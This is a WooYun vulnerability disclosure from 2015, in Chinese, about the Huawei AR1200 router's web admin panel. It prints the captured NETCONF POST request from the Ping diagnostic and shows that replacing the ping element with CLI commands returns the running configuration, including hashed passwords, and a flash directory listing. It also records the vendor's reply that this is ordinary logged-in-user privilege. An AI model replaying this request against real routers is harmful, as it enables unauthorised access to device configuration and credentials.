当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117671

漏洞标题:华为AR1200系列路由器后台代码任意执行

相关厂商:华为技术有限公司

漏洞作者: 1c3z

提交时间:2015-06-02 11:15

修复时间:2015-06-06 08:14

公开时间:2015-06-06 08:14

漏洞类型:命令执行

危害等级:中

自评Rank:8

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-02: 细节已通知厂商并且等待厂商处理中
2015-06-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

学校来了一批路由器,不会配,然后测试测试了下

详细说明:

有这么个功能
系统管理 > 诊断 > Ping

选区_045.png


抓包

POST http://192.168.1.119/view/main/config.cgi HTTP/1.1
Host: 192.168.1.119
Connection: keep-alive
Content-Length: 372
Origin: http://192.168.1.119
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/41.0.2272.76 Chrome/41.0.2272.76 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://192.168.1.119/view/main/default.html?Version=1.2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no
SessionID=M1iBvH1s0kak71m1qqL4YFpG7iW5dxin&MessageID=280&<rpc message-id="280" xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<edit-config operation="merge">
<target>
<running/>
</target>
<error-option>stop-on-error</error-option>
<config>
<featurename istop="true" type="cli">
<quit></quit>
<ping>192.168.1.1</ping>
</featurename>
</config>
</edit-config>
</rpc>]]>]]>


把<ping>192.168.1.1</ping>
改为<display>current-configuration</display>
返回内容

HTTP/1.1 200 OK
Server: AR
Date: tue, 02 jun 2015 10:29:11 GMT
Content-Type: text/xml
Content-Length: 1402
Set-Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no
Connection: Close
<?xml version="1.0"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="280">
<ok/>
</rpc-reply>
[V200R005C10SPC500]
#
drop illegal-mac alarm
#
wlan ac-global carrier id other ac id 0
#
pki realm default
enrollment self-signed
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password irreversible-cipher %@%@o~ho0DSI#)c&'+VR0uq2.fN8Hp:0#&|@-6h~GlN!:z~CfN;.%@%@
local-user admin privilege level 3
local-user admin service-type telnet web http
#
firewall zone Local
priority 16
#
interface Ethernet0/0/0
#
interface Ethernet0/0/1
#
interface Ethernet0/0/2
#
interface Ethernet0/0/3
#
interface Ethernet0/0/4
#
interface Ethernet0/0/5
#
interface Ethernet0/0/6
#
interface Ethernet0/0/7
#
interface GigabitEthernet0/0/0
#
interface GigabitEthernet0/0/1
ip address 192.168.1.119 255.255.255.0
#
interface Cellular0/0/0
#
interface Cellular0/0/1
#
interface NULL0
#
snmp-agent local-engineid 800007DB0330D17EED3C03
#
http server enable
http secure-server enable
#
user-interface con 0
authentication-mode password
set authentication password cipher %@%@C;@(!jYWE$qrE5"Q`q>7,7x)$I7.F$3jZ'IHQjB"E^|O7x,,%@%@
user-interface vty 0 4
authentication-mode aaa
#
wlan ac
#
voice
#
diagnose
#
return

漏洞证明:

<dir></dir>
HTTP/1.1 200 OK
Server: AR
Date: tue, 02 jun 2015 10:30:29 GMT
Content-Type: text/xml
Content-Length: 917
Set-Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no
Connection: Close
<?xml version="1.0"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="280">
<ok/>
</rpc-reply>
Directory of flash:/
Idx Attr Size(Byte) Date Time(LMT) FileName
0 -rw- 304,700 Mar 27 2015 15:22:32 sacrule.dat
1 -rw- 3,850 Jun 02 2015 07:30:07 mon_file.txt
2 -rw- 111,630,208 Jun 11 2014 03:05:56 AR1220F-V200R005C10SPC500.cc
3 -rw- 0 Mar 27 2015 15:21:58 brdxpon_snmp_cfg.efs
4 -rw- 694 Mar 30 2015 15:25:26 vrpcfg.zip
5 -rw- 396 Mar 30 2015 15:25:26 private-data.txt
6 drw- - Jun 11 2014 12:28:36 dhcp
7 drw- - Jun 11 2014 12:28:38 security
8 -rw- 1,260 Jun 11 2014 12:29:28 rsa_host_key.efs
9 -rw- 540 Jun 11 2014 12:29:32 rsa_server_key.efs
510,484 KB total (401,132 KB free)

修复方案:

你们更专业。。

版权声明:转载请注明来源 1c3z@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-06 08:14

厂商回复:

感谢白帽子对华为公司安全的关注。经确认,该权限为登录用户默认权限。并非漏洞。

最新状态:

暂无